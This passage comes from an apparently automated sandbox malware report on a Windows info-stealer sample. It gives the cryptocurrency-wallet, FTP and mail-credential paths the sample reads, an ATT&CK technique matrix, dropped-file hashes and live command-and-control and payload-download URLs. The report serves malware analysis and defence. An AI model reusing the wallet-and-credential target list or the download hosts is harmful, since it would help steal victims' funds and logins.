Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000001.00000003.1441862159.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1955784660.0000000000651000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1957372627.000000000100E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7732, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7732, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                      Command and Scripting Interpreter
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      12
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      12
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory1
                      Account Discovery
                      Remote Desktop Protocol3
                      Data from Local System
                      2
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job
                      3
                      Obfuscated Files or Information
                      Security Account Manager2
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing
                      NTDS235
                      System Information Discovery
                      Distributed Component Object ModelInput Capture112
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets771
                      Security Software Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                      Masquerading
                      Cached Domain Credentials241
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items241
                      Virtualization/Sandbox Evasion
                      DCSync3
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                      Process Injection
                      Proc Filesystem1
                      System Owner/User Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564522 Sample: file.exe Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 40 185.156.72.65 ITDELUXE-ASRU Russian Federation 2->40 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 14 other signatures 2->56 9 file.exe 16 2->9         started        14 skotes.exe 16 2->14         started        16 skotes.exe 2->16         started        signatures3 process4 dnsIp5 42 185.215.113.16, 49710, 80 WHOLESALECONNECTIONSNL Portugal 9->42 44 185.215.113.206, 49706, 49709, 49711 WHOLESALECONNECTIONSNL Portugal 9->44 34 C:\Users\user\DocumentsIIEBGIDAAF.exe, PE32 9->34 dropped 36 C:\Users\user\AppData\Local\...\random[1].exe, PE32 9->36 dropped 74 Detected unpacking (changes PE section rights) 9->74 76 Drops PE files to the document folder of the user 9->76 78 Tries to steal Mail credentials (via file / registry access) 9->78 86 7 other signatures 9->86 18 cmd.exe 1 9->18         started        46 185.215.113.43, 49714, 49715, 80 WHOLESALECONNECTIONSNL Portugal 14->46 48 31.41.244.11, 49716, 80 AEROEXPRESS-ASRU Russian Federation 14->48 38 C:\Users\user\AppData\...\607f096cd3.exe, PE32 14->38 dropped 80 Hides threads from debuggers 14->80 82 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->82 84 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->84 20 607f096cd3.exe 14->20         started        file6 signatures7 process8 signatures9 23 DocumentsIIEBGIDAAF.exe 4 18->23         started        27 conhost.exe 18->27         started        58 Multi AV Scanner detection for dropped file 20->58 60 Detected unpacking (changes PE section rights) 20->60 62 Tries to detect sandboxes and other dynamic analysis tools (window names) 20->62 64 5 other signatures 20->64 process10 file11 32 C:\Users\user\AppData\Local\...\skotes.exe, PE32 23->32 dropped 66 Antivirus detection for dropped file 23->66 68 Detected unpacking (changes PE section rights) 23->68 70 Machine Learning detection for dropped file 23->70 72 5 other signatures 23->72 29 skotes.exe 23->29         started        signatures12 process13 signatures14 88 Antivirus detection for dropped file 29->88 90 Detected unpacking (changes PE section rights) 29->90 92 Machine Learning detection for dropped file 29->92 94 4 other signatures 29->94

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      file.exe47%ReversingLabsWin32.Trojan.Generic
                      file.exe100%AviraTR/Crypt.TPM.Gen
                      file.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                      C:\Users\user\DocumentsIIEBGIDAAF.exe100%AviraTR/Crypt.TPM.Gen
                      C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                      C:\Users\user\DocumentsIIEBGIDAAF.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe29%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe29%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://31.41.244.11/files/unique2/random.exeX0%Avira URL Cloudsafe
                      http://185.215.113.16/mine/random.exesposition:0%Avira URL Cloudsafe
                      http://185.215.113.206/C-2100%Avira URL Cloudmalware
                      http://185.215.113.16/mine/random.exeH0%Avira URL Cloudsafe
                      http://31.41.244.11/files/unique2/random.exe100%Avira URL Cloudmalware
                      http://31.41.244.11/files/unique2/random.exew0%Avira URL Cloudsafe
                      http://185.215.113.206FID0%Avira URL Cloudsafe
                      http://185.215.113.206ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed292250%Avira URL Cloudsafe
                      http://185.215.113.16/mine/random.exe00Start5rm-data;0%Avira URL Cloudsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://185.215.113.43/Zu7JuNko/index.phpfalse
                        high
                        http://185.215.113.206/false
                          high
                          http://185.215.113.206/c4becf79229cb002.phpfalse
                            high
                            http://185.215.113.16/mine/random.exefalse
                              high
                              http://185.215.113.206/68b591d6548ec281/sqlite3.dllfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://185.215.113.206ee415cfae50ff216ac0bb82a7165ec9f5fc6e448abed29225file.exe, 00000001.00000002.1955784660.00000000006C8000.00000040.00000001.01000000.00000003.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.215.113.206/c4becf79229cb002.php?file.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://185.215.113.206/C-2file.exe, 00000001.00000002.1957372627.0000000001069000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://185.215.113.206/c4becf79229cb002.php~file.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://185.215.113.16/mine/random.exe00Start5rm-data;file.exe, 00000001.00000002.1955784660.0000000000838000.00000040.00000001.01000000.00000003.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://185.215.113.16/mine/random.exeHfile.exe, 00000001.00000002.1957372627.0000000001069000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://185.215.113.206/c4becf79229cb002.phpdfile.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://185.215.113.206s.exefile.exe, 00000001.00000002.1955784660.0000000000693000.00000040.00000001.01000000.00000003.sdmpfalse
                                        high
                                        http://185.215.113.206FIDfile.exe, 00000001.00000002.1955784660.00000000006C1000.00000040.00000001.01000000.00000003.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://185.215.113.16/mine/random.exesposition:file.exe, 00000001.00000002.1955784660.0000000000838000.00000040.00000001.01000000.00000003.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://185.215.113.206/c4becf79229cb002.php)file.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://31.41.244.11/files/unique2/random.exewskotes.exe, 0000000C.00000002.2673867668.0000000000C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://31.41.244.11/files/unique2/random.exeXskotes.exe, 0000000C.00000002.2673867668.0000000000C40000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://185.215.113.206file.exe, 00000001.00000002.1957372627.000000000100E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1955784660.0000000000693000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000002.1955784660.00000000006C8000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000002.1955784660.00000000006C1000.00000040.00000001.01000000.00000003.sdmpfalse
                                            high
                                            http://185.215.113.206/c4becf79229cb002.phpion:file.exe, 00000001.00000002.1955784660.00000000006C1000.00000040.00000001.01000000.00000003.sdmpfalse
                                              high
                                              http://185.215.113.206/c4becf79229cb002.phpinit.exefile.exe, 00000001.00000002.1955784660.0000000000693000.00000040.00000001.01000000.00000003.sdmpfalse
                                                high
                                                http://www.sqlite.org/copyright.html.file.exe, 00000001.00000002.1983633659.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1976492237.000000001D604000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://31.41.244.11/files/unique2/random.exeskotes.exe, 0000000C.00000002.2673867668.0000000000C40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  185.215.113.43
                                                  unknownPortugal
                                                  206894WHOLESALECONNECTIONSNLtrue
                                                  185.156.72.65
                                                  unknownRussian Federation
                                                  44636ITDELUXE-ASRUtrue
                                                  185.215.113.206
                                                  unknownPortugal
                                                  206894WHOLESALECONNECTIONSNLtrue
                                                  185.215.113.16
                                                  unknownPortugal
                                                  206894WHOLESALECONNECTIONSNLtrue
                                                  31.41.244.11
                                                  unknownRussian Federation
                                                  61974AEROEXPRESS-ASRUfalse
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1564522
                                                  Start date and time:2024-11-28 13:09:11 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 7m 23s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:15
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:file.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@12/5@0/5
                                                  EGA Information:
                                                  • Successful, ratio: 50%
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target DocumentsIIEBGIDAAF.exe, PID 1296 because it is empty
                                                  • Execution Graph export aborted for target file.exe, PID 7732 because there are no executed function
                                                  • Execution Graph export aborted for target skotes.exe, PID 4124 because there are no executed function
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: file.exe
                                                  TimeTypeDescription
                                                  07:10:42API Interceptor165x Sleep call for process: file.exe modified
                                                  07:12:02API Interceptor121x Sleep call for process: skotes.exe modified
                                                  13:11:06Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  185.215.113.43file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.43/Zu7JuNko/index.php
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.43/Zu7JuNko/index.php
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.43/Zu7JuNko/index.php
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.43/Zu7JuNko/index.php
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.43/Zu7JuNko/index.php
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.43/Zu7JuNko/index.php
                                                  file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                  • 185.215.113.43/Zu7JuNko/index.php
                                                  file.exeGet hashmaliciousPureCrypter, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                  • 185.215.113.43/Zu7JuNko/index.php
                                                  file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                  • 185.215.113.43/Zu7JuNko/index.php
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                  • 185.215.113.43/Zu7JuNko/index.php
                                                  185.156.72.65file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65/soft/download
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65/soft/download
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65/soft/download
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65/soft/download
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65/soft/download
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65/soft/download
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65/soft/download
                                                  file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                  • 185.156.72.65/files/download
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65/soft/download
                                                  file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                  • 185.156.72.65/files/download
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  file.exeGet hashmaliciousStealcBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 185.215.113.206
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 185.215.113.16
                                                  ITDELUXE-ASRUfile.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65
                                                  file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                  • 185.156.72.65
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                  • 185.156.72.65
                                                  file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                  • 185.156.72.65
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\file.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2031104
                                                  Entropy (8bit):7.947380408247561
                                                  Encrypted:false
                                                  SSDEEP:49152:G47/3FtXjwBrEZBn+fb04IMp+dQEVBCDm8cUH7fYgcUnn7NrnV3e:NbXYYn+fb7xpaQEVcvrHzbnZt
                                                  MD5:B2D9E9B305C92045DFDF886CF0287182
                                                  SHA1:F983CACA99EF85AAE37D6FA602BAB335F99C91DC
                                                  SHA-256:AE564D1F04BDA2B085436A00FF9A1A210360748E313994297CB4718B11E9BF92
                                                  SHA-512:CDFC38B48F730A258381A83A9EAAA9BEE38DBCE95AC97FE60D0DED1419B288DBA9F779796AF4342D6FCED67F7CD6B01568FA4E4F6F4115EE8351D84AD0BCAE13
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<......<......<.....<..~G...<...=.3.<......<......<......<.Rich..<.........PE..L....[.d.................|............L...........@..........................0L......5......................................[...o....`..8.....................................................K..................................................... . .P..........................@....rsrc...8....`...<..................@....idata ............................@... ..*.........................@...dfoyrrjq......1.....................@...vzxhknim......K.....................@....taggant.0....L.."..................@...........................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2031104
                                                  Entropy (8bit):7.947380408247561
                                                  Encrypted:false
                                                  SSDEEP:49152:G47/3FtXjwBrEZBn+fb04IMp+dQEVBCDm8cUH7fYgcUnn7NrnV3e:NbXYYn+fb7xpaQEVcvrHzbnZt
                                                  MD5:B2D9E9B305C92045DFDF886CF0287182
                                                  SHA1:F983CACA99EF85AAE37D6FA602BAB335F99C91DC
                                                  SHA-256:AE564D1F04BDA2B085436A00FF9A1A210360748E313994297CB4718B11E9BF92
                                                  SHA-512:CDFC38B48F730A258381A83A9EAAA9BEE38DBCE95AC97FE60D0DED1419B288DBA9F779796AF4342D6FCED67F7CD6B01568FA4E4F6F4115EE8351D84AD0BCAE13
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<......<......<.....<..~G...<...=.3.<......<......<......<.Rich..<.........PE..L....[.d.................|............L...........@..........................0L......5......................................[...o....`..8.....................................................K..................................................... . .P..........................@....rsrc...8....`...<..................@....idata ............................@... ..*.........................@...dfoyrrjq......1.....................@...vzxhknim......K.....................@....taggant.0....L.."..................@...........................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\DocumentsIIEBGIDAAF.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1906176
                                                  Entropy (8bit):7.950354771205895
                                                  Encrypted:false
                                                  SSDEEP:49152:40CdISVh6geEuk+SMPW212P6TH5MNopmxJnXaHe:4xISV0/raWrUNopkZKHe
                                                  MD5:9E221BE6B28A24EC318E27C499DA8C8F
                                                  SHA1:58B34CE63400AD6A54C0EE96886486F2C1DAFEBB
                                                  SHA-256:DEB8B42416072A6BE8C2A0D957DB28F5C4A67AC707C4F5F20DA46EFE23D85D90
                                                  SHA-512:615C796734448621AA1692BD4E61F7B4B14772EFE50C157E8505030699B0299FA7C34DE2191E202F7678D96EC385EB82628C3CB91D4210542F2199177AAEE2B7
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................K...........@...........................K...........@.................................W...k.......D...................x.K.............................(.K..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..*.........................@...cldzocnb......1.....................@...rviyezxx......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\file.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1906176
                                                  Entropy (8bit):7.950354771205895
                                                  Encrypted:false
                                                  SSDEEP:49152:40CdISVh6geEuk+SMPW212P6TH5MNopmxJnXaHe:4xISV0/raWrUNopkZKHe
                                                  MD5:9E221BE6B28A24EC318E27C499DA8C8F
                                                  SHA1:58B34CE63400AD6A54C0EE96886486F2C1DAFEBB
